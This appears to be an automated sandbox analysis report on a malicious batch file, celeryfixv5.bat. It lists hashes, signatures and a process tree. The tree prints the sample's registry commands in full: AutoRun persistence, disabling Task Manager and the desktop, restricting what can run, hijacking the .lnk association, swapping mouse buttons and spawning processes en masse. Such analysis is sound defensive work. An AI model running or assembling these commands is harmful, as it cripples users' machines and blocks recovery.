593b64d3729ad55c2c6dd7ebb81903505b65f6ea087bdce3c0dfe94179710d33

Analysis

max time kernel
92s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14/07/2024, 16:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

celeryfixv5.bat
Size

1KB
MD5

ff97f2b440aa3979458c1745b43f2a2a
SHA1

9748911e288e3992a4b5e17c760c2a606ec1d9d3
SHA256

593b64d3729ad55c2c6dd7ebb81903505b65f6ea087bdce3c0dfe94179710d33
SHA512

f4d164e206b1afe70e5de675646884bacecd8f9058be032ef6cb2ab198807f8c5a51f243fae77255a5912cf781cf3182a8d73ffcb98b9e1b8a60661b22ee4804

Score

8^/10

evasion

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File created	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe
File opened for modification	C:\Windows\system32\batinit.bat	cmd.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = ".pdf"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe

Modifies registry key 1 TTPs 49 IoCs

Modify Registry

T1112

pid	Process
10524	reg.exe
15332	reg.exe
26012	reg.exe
6560	reg.exe
11112	reg.exe
3960	reg.exe
1812	reg.exe
4092	reg.exe
14180	reg.exe
2384	reg.exe
320	reg.exe
17980	reg.exe
18764	reg.exe
4044	reg.exe
9068	reg.exe
9844	reg.exe
24040	reg.exe
2104	reg.exe
2016	reg.exe
10400	reg.exe
12576	reg.exe
684	reg.exe
16192	reg.exe
21084	reg.exe
14180	reg.exe
3940	reg.exe
2872	reg.exe
424	reg.exe
15356	reg.exe
10224	reg.exe
10456	reg.exe
3572	reg.exe
1108	reg.exe
4872	reg.exe
6548	reg.exe
8308	reg.exe
20904	reg.exe
26756	reg.exe
4336	reg.exe
12752	reg.exe
20960	reg.exe
26716	reg.exe
4280	reg.exe
1148	reg.exe
2012	reg.exe
5616	reg.exe
4940	reg.exe
3724	reg.exe
16948	reg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4836	helppane.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4836	helppane.exe
4836	helppane.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 1840	4692	cmd.exe	84
PID 4692 wrote to memory of 1840	4692	cmd.exe	84
PID 4692 wrote to memory of 2364	4692	cmd.exe	86
PID 4692 wrote to memory of 2364	4692	cmd.exe	86
PID 4692 wrote to memory of 3600	4692	cmd.exe	87
PID 4692 wrote to memory of 3600	4692	cmd.exe	87
PID 4692 wrote to memory of 3572	4692	cmd.exe	88
PID 4692 wrote to memory of 3572	4692	cmd.exe	88
PID 1840 wrote to memory of 4044	1840	cmd.exe	89
PID 1840 wrote to memory of 4044	1840	cmd.exe	89
PID 4692 wrote to memory of 3960	4692	cmd.exe	91
PID 4692 wrote to memory of 3960	4692	cmd.exe	91
PID 1840 wrote to memory of 4404	1840	cmd.exe	92
PID 1840 wrote to memory of 4404	1840	cmd.exe	92
PID 4692 wrote to memory of 684	4692	cmd.exe	93
PID 4692 wrote to memory of 684	4692	cmd.exe	93
PID 1840 wrote to memory of 5108	1840	cmd.exe	94
PID 1840 wrote to memory of 5108	1840	cmd.exe	94
PID 4692 wrote to memory of 3940	4692	cmd.exe	95
PID 4692 wrote to memory of 3940	4692	cmd.exe	95
PID 4044 wrote to memory of 3704	4044	cmd.exe	96
PID 4044 wrote to memory of 3704	4044	cmd.exe	96
PID 1840 wrote to memory of 4280	1840	cmd.exe	98
PID 1840 wrote to memory of 4280	1840	cmd.exe	98
PID 4692 wrote to memory of 2872	4692	cmd.exe	99
PID 4692 wrote to memory of 2872	4692	cmd.exe	99
PID 4692 wrote to memory of 1812	4692	cmd.exe	100
PID 4692 wrote to memory of 1812	4692	cmd.exe	100
PID 4044 wrote to memory of 2060	4044	cmd.exe	101
PID 4044 wrote to memory of 2060	4044	cmd.exe	101
PID 1840 wrote to memory of 2384	1840	cmd.exe	102
PID 1840 wrote to memory of 2384	1840	cmd.exe	102
PID 4044 wrote to memory of 2736	4044	cmd.exe	103
PID 4044 wrote to memory of 2736	4044	cmd.exe	103
PID 1840 wrote to memory of 1148	1840	cmd.exe	104
PID 1840 wrote to memory of 1148	1840	cmd.exe	104
PID 4044 wrote to memory of 320	4044	cmd.exe	171
PID 4044 wrote to memory of 320	4044	cmd.exe	171
PID 4692 wrote to memory of 2088	4692	cmd.exe	105
PID 4692 wrote to memory of 2088	4692	cmd.exe	105
PID 4044 wrote to memory of 4940	4044	cmd.exe	107
PID 4044 wrote to memory of 4940	4044	cmd.exe	107
PID 1840 wrote to memory of 1108	1840	cmd.exe	108
PID 1840 wrote to memory of 1108	1840	cmd.exe	108
PID 3704 wrote to memory of 4064	3704	cmd.exe	109
PID 3704 wrote to memory of 4064	3704	cmd.exe	109
PID 4044 wrote to memory of 2016	4044	cmd.exe	110
PID 4044 wrote to memory of 2016	4044	cmd.exe	110
PID 4044 wrote to memory of 2012	4044	cmd.exe	112
PID 4044 wrote to memory of 2012	4044	cmd.exe	112
PID 3704 wrote to memory of 4252	3704	cmd.exe	177
PID 3704 wrote to memory of 4252	3704	cmd.exe	177
PID 1840 wrote to memory of 3724	1840	cmd.exe	176
PID 1840 wrote to memory of 3724	1840	cmd.exe	176
PID 3704 wrote to memory of 708	3704	cmd.exe	115
PID 3704 wrote to memory of 708	3704	cmd.exe	115
PID 4692 wrote to memory of 852	4692	cmd.exe	116
PID 4692 wrote to memory of 852	4692	cmd.exe	116
PID 4044 wrote to memory of 4336	4044	cmd.exe	118
PID 4044 wrote to memory of 4336	4044	cmd.exe	118
PID 4692 wrote to memory of 1172	4692	cmd.exe	117
PID 4692 wrote to memory of 1172	4692	cmd.exe	117
PID 4692 wrote to memory of 1172	4692	cmd.exe	117
PID 1840 wrote to memory of 424	1840	cmd.exe	119

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\celeryfixv5.bat"
1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K celeryfixv5.bat
  2⤵
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K celeryfixv5.bat
    3⤵
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K celeryfixv5.bat
      4⤵
      Drops file in System32 directory
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3704
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        5⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:4064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        6⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:5696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        7⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:8276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        8⤵
        
        PID:9792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        9⤵
        
        PID:12900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        10⤵
        
        PID:17176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        11⤵
        
        PID:18020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        12⤵
        
        PID:18940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K celeryfixv5.bat
        13⤵
        
        PID:19200
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        13⤵
        
        PID:19208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        13⤵
        
        PID:20872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        12⤵
        
        PID:18968
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        12⤵
        
        PID:19912
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        12⤵
        Modifies registry key
        
        PID:24040
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
        12⤵
        Modifies registry key
        
        PID:26012
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        12⤵
        Modifies registry key
        
        PID:26716
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        12⤵
        Modifies registry key
        
        PID:26756
        
        C:\Windows\system32\reg.exe
        
        reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
        12⤵
        Modifies registry key
        
        PID:4044
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        11⤵
        
        PID:18052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        11⤵
        
        PID:19000
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        11⤵
        Modifies registry key
        
        PID:21084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        9⤵
        
        PID:12984
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        9⤵
        
        PID:13636
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        9⤵
        Modifies registry key
        
        PID:16948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        8⤵
        
        PID:10468
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        8⤵
        
        PID:11528
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        8⤵
        Modifies registry key
        
        PID:14180
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
        8⤵
        Modifies registry key
        
        PID:16192
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        8⤵
        Modifies registry key
        
        PID:17980
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        8⤵
        Modifies registry key
        
        PID:18764
        
        C:\Windows\system32\reg.exe
        
        reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
        8⤵
        Modifies registry key
        
        PID:20904
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
        8⤵
        Modifies registry key
        
        PID:20960
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows/system32/rundll32 user32, SwapMouseButton
        8⤵
        
        PID:24772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
        8⤵
        
        PID:26196
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:26844
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:26852
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:26860
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:26872
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27276
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27308
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27316
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27332
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27352
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27368
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27388
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27400
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27408
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27420
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27432
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27444
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27456
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27468
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27480
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27504
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27512
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27520
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27540
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27556
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27568
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27584
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27600
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27608
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27624
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27636
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27644
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:26720
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:26668
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27660
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27672
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27696
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27712
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27720
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27732
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27744
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27760
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27772
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27780
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27792
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27808
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27820
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27832
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27844
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27868
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27880
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27892
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27900
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27924
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27936
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27948
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27964
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27980
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:27992
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28000
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28016
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28028
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28040
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28056
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28072
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28088
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28100
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28116
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28132
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28148
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28156
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28168
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28180
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28192
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28204
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28224
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28236
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28244
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28260
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28276
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28288
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28300
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28316
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28324
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28344
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28360
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28372
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:28384
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        8⤵
        
        PID:29304
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        7⤵
        
        PID:8616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        7⤵
        
        PID:9756
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10400
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
        7⤵
        Modifies registry key
        
        PID:10456
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        7⤵
        Modifies registry key
        
        PID:11112
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12576
        
        C:\Windows\system32\reg.exe
        
        reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:15332
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
        7⤵
        Modifies registry key
        
        PID:14180
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows/system32/rundll32 user32, SwapMouseButton
        7⤵
        
        PID:15396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
        7⤵
        
        PID:18000
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        6⤵
        
        PID:6516
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        6⤵
        
        PID:6464
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:9068
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
        6⤵
        Modifies registry key
        
        PID:9844
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        6⤵
        Modifies registry key
        
        PID:10224
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:10524
      - C:\Windows\system32\reg.exe
        
        reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:12752
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
        6⤵
        Modifies registry key
        
        PID:15356
      - C:\Windows\system32\rundll32.exe
        
        C:\Windows/system32/rundll32 user32, SwapMouseButton
        6⤵
        
        PID:17744
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
        6⤵
        
        PID:17744
      - C:\Windows\winhlp32.exe
        
        winhlp32
        6⤵
        
        PID:19448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
        5⤵
        
        PID:4252
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        5⤵
        
        PID:708
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2104
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
        5⤵
        Modifies registry key
        
        PID:4092
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        5⤵
        Modifies registry key
        
        PID:5616
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6548
    - - C:\Windows\system32\reg.exe
        
        reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6560
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
        5⤵
        Modifies registry key
        
        PID:8308
    - - C:\Windows\system32\rundll32.exe
        
        C:\Windows/system32/rundll32 user32, SwapMouseButton
        5⤵
        
        PID:9748
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
        5⤵
        
        PID:11548
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:13384
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:13428
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14100
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14292
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14316
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14328
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14340
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14396
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14412
